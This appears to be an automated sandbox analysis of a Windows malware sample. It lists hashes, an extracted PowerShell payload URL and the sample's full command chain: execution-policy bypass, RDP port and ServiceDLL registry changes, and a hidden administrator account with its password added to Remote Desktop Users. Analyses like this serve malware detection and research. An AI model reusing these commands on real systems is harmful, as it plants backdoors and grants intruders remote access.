Analysis
-
max time kernel
150s -
max time network
99s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
24-09-2021 21:43
Static task
static1
Behavioral task
behavioral1
Sample
83d119a963e7050995f9bf6be8841b95.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
83d119a963e7050995f9bf6be8841b95.exe
Resource
win10v20210408
General
-
Target
83d119a963e7050995f9bf6be8841b95.exe
-
Size
5.7MB
-
MD5
83d119a963e7050995f9bf6be8841b95
-
SHA1
2ba0e479d5c2b7b9b28c7f946bd56489cedaa126
-
SHA256
d7ef71aa67e1fb5a364c97ff4b89f5f6a28db1c84f91563547a4e44581833486
-
SHA512
4c740f5e0f4787fc268239882fe9b74ee00944053ac4c45ca1d114dbd22954f00c3f4fd5fb39be932b44e6da9380466d07b324150454357bf7b12a17b77ceffe
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 8 5068 powershell.exe 10 5068 powershell.exe 11 5068 powershell.exe 12 5068 powershell.exe 14 5068 powershell.exe 16 5068 powershell.exe 18 5068 powershell.exe 20 5068 powershell.exe 22 5068 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 4232 4232 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_zx3sgsyg.0ou.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF7DA.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF7EB.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1cm2mslq.hrb.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF77A.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF7C9.tmp powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF7FB.tmp powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
WMIC.exepowershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 10 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 12 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 14 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4936 powershell.exe 4936 powershell.exe 4936 powershell.exe 3392 powershell.exe 3392 powershell.exe 3392 powershell.exe 416 powershell.exe 416 powershell.exe 416 powershell.exe 1100 powershell.exe 1100 powershell.exe 1100 powershell.exe 4936 powershell.exe 4936 powershell.exe 4936 powershell.exe 5068 powershell.exe 5068 powershell.exe 5068 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 616 616 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4936 powershell.exe Token: SeDebugPrivilege 3392 powershell.exe Token: SeIncreaseQuotaPrivilege 3392 powershell.exe Token: SeSecurityPrivilege 3392 powershell.exe Token: SeTakeOwnershipPrivilege 3392 powershell.exe Token: SeLoadDriverPrivilege 3392 powershell.exe Token: SeSystemProfilePrivilege 3392 powershell.exe Token: SeSystemtimePrivilege 3392 powershell.exe Token: SeProfSingleProcessPrivilege 3392 powershell.exe Token: SeIncBasePriorityPrivilege 3392 powershell.exe Token: SeCreatePagefilePrivilege 3392 powershell.exe Token: SeBackupPrivilege 3392 powershell.exe Token: SeRestorePrivilege 3392 powershell.exe Token: SeShutdownPrivilege 3392 powershell.exe Token: SeDebugPrivilege 3392 powershell.exe Token: SeSystemEnvironmentPrivilege 3392 powershell.exe Token: SeRemoteShutdownPrivilege 3392 powershell.exe Token: SeUndockPrivilege 3392 powershell.exe Token: SeManageVolumePrivilege 3392 powershell.exe Token: 33 3392 powershell.exe Token: 34 3392 powershell.exe Token: 35 3392 powershell.exe Token: 36 3392 powershell.exe Token: SeDebugPrivilege 416 powershell.exe Token: SeIncreaseQuotaPrivilege 416 powershell.exe Token: SeSecurityPrivilege 416 powershell.exe Token: SeTakeOwnershipPrivilege 416 powershell.exe Token: SeLoadDriverPrivilege 416 powershell.exe Token: SeSystemProfilePrivilege 416 powershell.exe Token: SeSystemtimePrivilege 416 powershell.exe Token: SeProfSingleProcessPrivilege 416 powershell.exe Token: SeIncBasePriorityPrivilege 416 powershell.exe Token: SeCreatePagefilePrivilege 416 powershell.exe Token: SeBackupPrivilege 416 powershell.exe Token: SeRestorePrivilege 416 powershell.exe Token: SeShutdownPrivilege 416 powershell.exe Token: SeDebugPrivilege 416 powershell.exe Token: SeSystemEnvironmentPrivilege 416 powershell.exe Token: SeRemoteShutdownPrivilege 416 powershell.exe Token: SeUndockPrivilege 416 powershell.exe Token: SeManageVolumePrivilege 416 powershell.exe Token: 33 416 powershell.exe Token: 34 416 powershell.exe Token: 35 416 powershell.exe Token: 36 416 powershell.exe Token: SeDebugPrivilege 1100 powershell.exe Token: SeIncreaseQuotaPrivilege 1100 powershell.exe Token: SeSecurityPrivilege 1100 powershell.exe Token: SeTakeOwnershipPrivilege 1100 powershell.exe Token: SeLoadDriverPrivilege 1100 powershell.exe Token: SeSystemProfilePrivilege 1100 powershell.exe Token: SeSystemtimePrivilege 1100 powershell.exe Token: SeProfSingleProcessPrivilege 1100 powershell.exe Token: SeIncBasePriorityPrivilege 1100 powershell.exe Token: SeCreatePagefilePrivilege 1100 powershell.exe Token: SeBackupPrivilege 1100 powershell.exe Token: SeRestorePrivilege 1100 powershell.exe Token: SeShutdownPrivilege 1100 powershell.exe Token: SeDebugPrivilege 1100 powershell.exe Token: SeSystemEnvironmentPrivilege 1100 powershell.exe Token: SeRemoteShutdownPrivilege 1100 powershell.exe Token: SeUndockPrivilege 1100 powershell.exe Token: SeManageVolumePrivilege 1100 powershell.exe Token: 33 1100 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
83d119a963e7050995f9bf6be8841b95.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 4796 wrote to memory of 4936 4796 83d119a963e7050995f9bf6be8841b95.exe powershell.exe PID 4796 wrote to memory of 4936 4796 83d119a963e7050995f9bf6be8841b95.exe powershell.exe PID 4936 wrote to memory of 5104 4936 powershell.exe csc.exe PID 4936 wrote to memory of 5104 4936 powershell.exe csc.exe PID 5104 wrote to memory of 3268 5104 csc.exe cvtres.exe PID 5104 wrote to memory of 3268 5104 csc.exe cvtres.exe PID 4936 wrote to memory of 3392 4936 powershell.exe powershell.exe PID 4936 wrote to memory of 3392 4936 powershell.exe powershell.exe PID 4936 wrote to memory of 416 4936 powershell.exe powershell.exe PID 4936 wrote to memory of 416 4936 powershell.exe powershell.exe PID 4936 wrote to memory of 1100 4936 powershell.exe powershell.exe PID 4936 wrote to memory of 1100 4936 powershell.exe powershell.exe PID 4936 wrote to memory of 4716 4936 powershell.exe reg.exe PID 4936 wrote to memory of 4716 4936 powershell.exe reg.exe PID 4936 wrote to memory of 3344 4936 powershell.exe reg.exe PID 4936 wrote to memory of 3344 4936 powershell.exe reg.exe PID 4936 wrote to memory of 3340 4936 powershell.exe reg.exe PID 4936 wrote to memory of 3340 4936 powershell.exe reg.exe PID 4936 wrote to memory of 4104 4936 powershell.exe net.exe PID 4936 wrote to memory of 4104 4936 powershell.exe net.exe PID 4104 wrote to memory of 1008 4104 net.exe net1.exe PID 4104 wrote to memory of 1008 4104 net.exe net1.exe PID 4936 wrote to memory of 3604 4936 powershell.exe cmd.exe PID 4936 wrote to memory of 3604 4936 powershell.exe cmd.exe PID 3604 wrote to memory of 3708 3604 cmd.exe cmd.exe PID 3604 wrote to memory of 3708 3604 cmd.exe cmd.exe PID 3708 wrote to memory of 2884 3708 cmd.exe net.exe PID 3708 wrote to memory of 2884 3708 cmd.exe net.exe PID 2884 wrote to memory of 4260 2884 net.exe net1.exe PID 2884 wrote to memory of 4260 2884 net.exe net1.exe PID 4936 wrote to memory of 740 4936 powershell.exe cmd.exe PID 4936 wrote to memory of 740 4936 powershell.exe cmd.exe PID 740 wrote to memory of 3848 740 cmd.exe cmd.exe PID 740 wrote to memory of 3848 740 cmd.exe cmd.exe PID 3848 wrote to memory of 3940 3848 cmd.exe net.exe PID 3848 wrote to memory of 3940 3848 cmd.exe net.exe PID 3940 wrote to memory of 3440 3940 net.exe net1.exe PID 3940 wrote to memory of 3440 3940 net.exe net1.exe PID 4264 wrote to memory of 3684 4264 cmd.exe net.exe PID 4264 wrote to memory of 3684 4264 cmd.exe net.exe PID 3684 wrote to memory of 4496 3684 net.exe net1.exe PID 3684 wrote to memory of 4496 3684 net.exe net1.exe PID 812 wrote to memory of 1396 812 cmd.exe net.exe PID 812 wrote to memory of 1396 812 cmd.exe net.exe PID 1396 wrote to memory of 1524 1396 net.exe net1.exe PID 1396 wrote to memory of 1524 1396 net.exe net1.exe PID 1808 wrote to memory of 1040 1808 cmd.exe net.exe PID 1808 wrote to memory of 1040 1808 cmd.exe net.exe PID 1040 wrote to memory of 580 1040 net.exe net1.exe PID 1040 wrote to memory of 580 1040 net.exe net1.exe PID 2500 wrote to memory of 3240 2500 cmd.exe net.exe PID 2500 wrote to memory of 3240 2500 cmd.exe net.exe PID 3240 wrote to memory of 3632 3240 net.exe net1.exe PID 3240 wrote to memory of 3632 3240 net.exe net1.exe PID 4064 wrote to memory of 4068 4064 cmd.exe net.exe PID 4064 wrote to memory of 4068 4064 cmd.exe net.exe PID 4068 wrote to memory of 3496 4068 net.exe net1.exe PID 4068 wrote to memory of 3496 4068 net.exe net1.exe PID 2352 wrote to memory of 2844 2352 cmd.exe net.exe PID 2352 wrote to memory of 2844 2352 cmd.exe net.exe PID 2844 wrote to memory of 4076 2844 net.exe net1.exe PID 2844 wrote to memory of 4076 2844 net.exe net1.exe PID 2080 wrote to memory of 4556 2080 cmd.exe WMIC.exe PID 2080 wrote to memory of 4556 2080 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe"C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5drmgc1n\5drmgc1n.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:5104 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES970B.tmp" "c:\Users\Admin\AppData\Local\Temp\5drmgc1n\CSCB94FCE7A99CF424194347C4E4E2EB2.TMP"4⤵PID:3268
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:416 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1100 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:4716
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:3344 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:3340
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1008
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:4260
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:3848 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:3940 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:3440
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:1216
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1828
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:4264 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:3684 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:4496
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 6letaiCK /add1⤵
- Suspicious use of WriteProcessMemory
PID:812 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 6letaiCK /add2⤵
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 6letaiCK /add3⤵PID:1524
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:580
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3240 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD3⤵PID:3632
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:3496
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 6letaiCK1⤵
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 6letaiCK2⤵
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 6letaiCK3⤵PID:4076
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
PID:4556
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:4708
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:3344
-
